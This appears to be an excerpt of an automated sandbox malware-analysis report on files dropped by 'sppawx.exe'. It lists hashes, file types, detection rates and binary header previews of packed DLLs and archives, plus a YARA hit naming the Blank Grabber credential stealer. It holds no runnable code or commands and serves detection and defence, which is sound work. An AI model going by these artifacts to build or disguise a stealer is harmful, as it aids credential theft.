                                                                                                                                                                                                                            SSDEEP:768:6EKW7574DsajR20fnfPHz8HLP8pfbnIGOINg5YiSyvIAMxkE3n1:jKW7hq00fnTQEbnIGOINy7Sy+xzn1
                                                                                                                                                                                                                            MD5:C8B153F0BE8569CE2C2DE3D55952D9C7
                                                                                                                                                                                                                            SHA1:0861D6DCD9B28ABB8B69048CAF3C073E94F87FDC
                                                                                                                                                                                                                            SHA-256:AF9F39D2A5D762214F6DE2C8FEC0A5BC6BE0B8223EF47164CAA4C6E3D6437A58
                                                                                                                                                                                                                            SHA-512:81CCBFFF0F4CDD1502AF9D73928B940098B9ACC58B19C1A939ECDF17418096294AF4A4529EE7A0BBE1C686E3B0254651E211C1093264D1835065A82711AC0379
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.U&...&u..'...&u..'...&u..'...&u..'...&...'...&...'...&...&M..&...'...&...'...&..9&...&...'...&Rich...&........PE..d......e.........." ...#.P.........../.......................................P............`.........................................|K..P....I.......@.......................K.......................................;..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87832
                                                                                                                                                                                                                            Entropy (8bit):7.917277859124498
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:cjQY6vZR307kwHMn3NsbM5PlvQzSqoSdPN1uruZkU2D90nGt4pcgIGZ1rA7SyTx7:EQY6nEZe3NsbI1QzSwlaugudNIGZ1rAP
                                                                                                                                                                                                                            MD5:BC2EBD2A95619AB14A16944B0AB8BDE5
                                                                                                                                                                                                                            SHA1:C31BA45B911A2664FC622BB253374AB7512FC35A
                                                                                                                                                                                                                            SHA-256:AEB3FD8B855B35204B5088C7A1591CC1CA78FFFE707D70E41D99564B6CB617C6
                                                                                                                                                                                                                            SHA-512:86A6685EFEC72860991C0F0FA50F46A208211D3F8FC44012B12437D141C5F1A24C34A366F164D225869680707B482AB27A2720C698EBE8026F1C5807E81F8437
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........TB#.5,p.5,p.5,p.M.p.5,p.I-q.5,p.I)q.5,p.I(q.5,p.I/q.5,pnH-q.5,p.M-q.5,p.5-p.5,pnH!q.5,pnH,q.5,pnH.p.5,pnH.q.5,pRich.5,p........PE..d......e.........." ...#. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26904
                                                                                                                                                                                                                            Entropy (8bit):7.418027428269828
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Xzh/iDHAPcpqyIGQUNz5YiSyvHAMxkEJ5YSv:jhiDHAP5yIGQUN97SyPx/Y+
                                                                                                                                                                                                                            MD5:FCBB24550F59068A37EA09A490923C8A
                                                                                                                                                                                                                            SHA1:1E51D9C156354E00909C9F016DDB392A832F8078
                                                                                                                                                                                                                            SHA-256:DE2AC6D99234A28DCF583D90DCA7256DE986FCA9E896C9AAFD1F18BB536978B8
                                                                                                                                                                                                                            SHA-512:62474BF9D5F39591240F71FD9270FCC7A2B2C0B4A1F93CBB57021040AD85B3AB8C401D17AEDF0141105118772F453C6137A026736F069CC7A965CB30E5479F07
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:W\.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.M[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........................PE..d...Y..e.........." ...#.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):45336
                                                                                                                                                                                                                            Entropy (8bit):7.7177626825594965
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:O1X8HEfobVbgwsIZsQD182/q2vQttkmnIzPnzTpwOgIGLwgBT5YiSyvvBAMxkEn:CXz0gwsGsQD1ZbmiSOgIGLwgBd7SyZxL
                                                                                                                                                                                                                            MD5:F6D0876B14BCA5A264EC231895D80072
                                                                                                                                                                                                                            SHA1:D68B662CFC247C07851EF0764FE9652E3E2C0981
                                                                                                                                                                                                                            SHA-256:BCBF9A952473E53F130CE77B0DB69FE08C5845CE10DBE8C320B40F171A15D6A8
                                                                                                                                                                                                                            SHA-512:1DB02975634FFCC4E73FAC355D7F67A915C3B4189FEAF9E7B24EF831E9F4A2E60A4BD1EBFD8157282A4094814332D62957FCD204B20F2904527E203AB355AB8E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J./.+z|.+z|.+z|.S.|.+z|.W{}.+z|.W.}.+z|.W~}.+z|.Wy}.+z|}V{}.+z|.+{|.+z|.S{}.+z|}Vw}.+z|}Vz}.+z|}V.|.+z|}Vx}.+z|Rich.+z|................PE..d......e.........." ...#.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):59160
                                                                                                                                                                                                                            Entropy (8bit):7.835515959807496
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:e5ovI/e3wTAiHXhchuXbLfbmmKTnjBChRDLHKVIGOQQm7Syxx2e:e5fXAcew9KTjBCh1kIGOQQml
                                                                                                                                                                                                                            MD5:0FDEDCB9B3A45152239CA4B1AEA4B211
                                                                                                                                                                                                                            SHA1:1CCFF1F5E7B27C4156A231AD7A03BCC9695C5B92
                                                                                                                                                                                                                            SHA-256:0FC03D25467850181C0FC4F0F8919C8C47CBA2BF578698D4354AA84FD810C7F7
                                                                                                                                                                                                                            SHA-512:8CE5B38EE64AC0CDA831B6B2C746FB95BAADDA83665D8E125EAA8B4A07CB61B3EF88D60741B978B2108EC08B067F1C9C934099F539B1E24F55E3CA8350359611
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.g...g...g.......g..../..g......g....+..g....*..g....-..g..q./..g..../..g...g/..f..q.#..g..q....g..q...g..q.,..g..Rich.g..........PE..d......e.........." ...#.........p.. ........................................@............`..........................................;..P....9.......0..........8............;...................................... %..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):67352
                                                                                                                                                                                                                            Entropy (8bit):7.856108604878049
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:URuyAdinkEweTTDWPnQfNnPAdu8LfPXrBIGC777m7Synx5:2F9fEo58DPXdIGC77yN
                                                                                                                                                                                                                            MD5:53996068AE9CF68619DA8CB142410D5E
                                                                                                                                                                                                                            SHA1:9EB7465D6F22AB03DAC04CFCE668811A87E198F2
                                                                                                                                                                                                                            SHA-256:CBD320C42277086CD962FD0B25842904CEB436346D380319625F54363F031DCF
                                                                                                                                                                                                                            SHA-512:D5FBC53A2FFFECB1F3DA4B126E306961DE3B8070B5F722B6ED5E20BEF6AF48D52EDF96C975F68278E337BC78A25B4227E9EB44B51BAA786365A67CF977E4643E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.k.4.8.4.8.4.8.L)8.4.8.H.9.4.8.H.9.4.8.H.9.4.8.H.9.4.8kI.9.4.8.4.8#5.8.L.9.4.8kI.9.4.8kI.9.4.8kIE8.4.8kI.9.4.8Rich.4.8........................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1329520
                                                                                                                                                                                                                            Entropy (8bit):5.586655762137983
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:uttcY+b+vOmgRF1+fYNXPh26UZWAzCu7j5D95wdgkVodYOPjwwMJ9gCCaYc2I:uttcY+mHCiCA5TNqodYOPEPEaYc2I
                                                                                                                                                                                                                            MD5:898E35281A756640780DBC31A0B78452
                                                                                                                                                                                                                            SHA1:845B59CFD9FB152725F250A872E9D1D7A66AF258
                                                                                                                                                                                                                            SHA-256:0DAA440C78582A693DABBC2325A06D817131BB170BAD436B126BAD896F1377CD
                                                                                                                                                                                                                            SHA-512:421CC4A15E94293E53F1039B8BB5BE7EDCBC8E3E0E4ABC7F34FAF991993F51CB5F51493B58BB341CB9579347EC134B02104454075A8E7E33E45B8E3A66A44D79
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):113107
                                                                                                                                                                                                                            Entropy (8bit):7.743321261692021
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:99JWGY9ylSjwUnbh70LlwGxKB3huvEKAxC+7n6CttfsEesRAE2+b0SOQGrs0n+VQ:89J0UKpKBRuvMg+j6+F/2AOJw0veNNQ5
                                                                                                                                                                                                                            MD5:84B67E959E5E5AB383E347EBD19B3C08
                                                                                                                                                                                                                            SHA1:B483E960E79872303D7D7EADC7428B573AE6D7BB
                                                                                                                                                                                                                            SHA-256:D6FD956FDEBA6D7183EFEE08EA6AF44060234361EBABA59E02D26754403220E8
                                                                                                                                                                                                                            SHA-512:393C6C303653ED71CF7EE1320730B19DA9428EAB9D01EC7489930CCEDFB4433C07C09F91C9854C9E28A0FAB9615922D39FB6A35E29F2BAA12609AAE51DA64360
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK........]..Y...1]...].......stub-o.pyc........cfUg.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1629464
                                                                                                                                                                                                                            Entropy (8bit):7.952620301087112
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                                                            MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                                                                                                                                                                                            SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                                                                                                                                                                                            SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                                                                                                                                                                                            SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):29968
                                                                                                                                                                                                                            Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                            MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                            SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                            SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                            SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):229144
                                                                                                                                                                                                                            Entropy (8bit):7.930038440560372
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                                                            MD5:6EDA5A055B164E5E798429DCD94F5B88
                                                                                                                                                                                                                            SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
                                                                                                                                                                                                                            SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
                                                                                                                                                                                                                            SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1826072
                                                                                                                                                                                                                            Entropy (8bit):7.993990461497291
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:49152:fTBxkJIkNEakpCPK1JQyHi3p70PHY6/g7:teFNlUsK1ij31WYUW
                                                                                                                                                                                                                            MD5:86D9B8B15B0340D6EC235E980C05C3BE
                                                                                                                                                                                                                            SHA1:A03BDD45215A0381DCB3B22408DBC1F564661C73
                                                                                                                                                                                                                            SHA-256:12DBBCD67015D6CDB680752184107B7DEB84E906B0E8E860385F85D33858A5F6
                                                                                                                                                                                                                            SHA-512:D360CC3F00D90FD04CBBA09D879E2826968DF0C1FDC44890C60B8450FE028C3E767450C3543C62D4F284FB7E004A9A33C52538C2279221EE6CBDB1A9485F88B2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................m.................x...s...x......x......x......Rich............PE..d...=..e.........." ...#.........@Q...l..PQ...................................m...........`.........................................H/l......)l...... l......``..V............l. ...........................0.l.(...p.l.@...........................................UPX0.....@Q.............................UPX1.........PQ.....................@....rsrc........ l.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26392
                                                                                                                                                                                                                            Entropy (8bit):7.448215150146329
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:qnyukFaypXM5IGQGNf5YiSyvTcAMxkEMrX:qnGAaM5IGQGNR7Syb6xuX
                                                                                                                                                                                                                            MD5:CCE3E60EC05C80F5F5EE014BC933554C
                                                                                                                                                                                                                            SHA1:468D2757B201D6259034215CFD912E8E883F4B9E
                                                                                                                                                                                                                            SHA-256:84A81CCA6D80EDD9EC2D31926231DE393ED7F26ED86AE39219ADC5EAB24B8100
                                                                                                                                                                                                                            SHA-512:7CBCEE4DD4C817FBEF8B9AEF2D457B56970C5E5C03BDF2CAF74415316B44E7DA33EE39B6A434F4760C80F74C33B5C0C5AD00936D438B947A39FFCD53E890CF0C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d...Z..e.........." ...#.0................................................................`......................................... ...L....................`..............l..........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):637720
                                                                                                                                                                                                                            Entropy (8bit):7.993319352541641
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:kevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2UTwYqmH:k8oy8x4Rl1dRnxeDlZxsl2MsD0w9mH
                                                                                                                                                                                                                            MD5:C6ED91B8FDB99EBA4C099EB6D0EEA5D9
                                                                                                                                                                                                                            SHA1:915B2D004F3F07CD18610E413B087568258DA866
                                                                                                                                                                                                                            SHA-256:E6E1910E237AC7847748918804D1C414C0F1696A29E9718739312A233EB96D80
                                                                                                                                                                                                                            SHA-512:92FE738FCD75E39C6BC9F1EDB3B16A1A7CF3AE6C0D2C29C721B1A5BD3E07A4BB8E8295B3AD3CB44BCEE05A8110855B0FEA66B156461C4F1761C53C15D7E67EE5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):302872
                                                                                                                                                                                                                            Entropy (8bit):7.986491235737331
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:OtX6biS7ltWh4BvaEyS+KPUR30JlSEwV7hqoUnJG4qKOF6J:OZLS5YiyEFPPl3yqrJG4V06J
                                                                                                                                                                                                                            MD5:427668E55E99222B3F031B46FB888F3A
                                                                                                                                                                                                                            SHA1:C9BE630CB2536C20BBC6FC9BA4A57889CDB684BC
                                                                                                                                                                                                                            SHA-256:9CA1B01048D3867CB002A01A148F279BA9EDAF7B7AD04D17E3E911E445F2D831
                                                                                                                                                                                                                            SHA-512:E5CA0DDC2758891090DB726DE2D3FD7F2BA64E309979136B4D3299445B1F751DFD8CD56BB3343499CB6ED479C08732D1D349D32B7F7E5AC417352BD0CE676253
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
